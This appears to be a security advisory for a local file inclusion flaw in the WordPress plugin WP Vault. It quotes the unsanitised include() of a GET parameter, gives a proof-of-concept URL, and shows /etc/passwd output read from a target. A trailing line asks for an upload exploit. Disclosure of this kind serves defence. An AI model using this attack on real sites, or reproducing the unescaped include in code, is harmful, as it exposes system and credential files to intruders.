Homepage:
https://wordpress.org/plugins/wp-vault/
Description:
Type user access: any user.
$_GET[“wpv-image”] is not escaped in include file.
File / Code:
Path: /wp-content/plugins/wp-vault/trunk/wp-vault.php
Line: 228
include(dirname(__FILE__) . "/images/" . $_GET["wpv-image"]);
if (isset($_GET["wpv_file_id"])) { include(dirname(__FILE__) . "/wpv-file-handler.php"); exit; } else if (isset($_POST["wpv-tooltip"])) { include(dirname(__FILE__) . "/ajax-response/wpv-tooltip.php"); exit; } else if (isset($_GET["wpv-image"])) { include(dirname(__FILE__) . "/images/" . $_GET["wpv-image"]); exit; } else if (isset($_GET["wpv-css"])) { if (file_exists(dirname(__FILE__) . "/css/" . $_GET["wpv-css"] . ".css")) { header("Content-type: text/css"); include(dirname(__FILE__) . "/css/" . $_GET["wpv-css"] . ".css"); exit; } else if (file_exists(dirname(__FILE__) . "/css/" . $_GET["wpv-css"] . ".css.php")) { header("Content-type: text/css"); include(dirname(__FILE__) . "/css/" . $_GET["wpv-css"] . ".css.php"); exit; } }
Proof of Concept:
http://Target/?wpv-image=[LFI]
Result:
Print file, example, sensible files:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
…
Timeline:
- 28/11/2016 – Discovered
- 28/11/2016 – Vendor not found
I need To The Exploit WordPress Uplaod File Please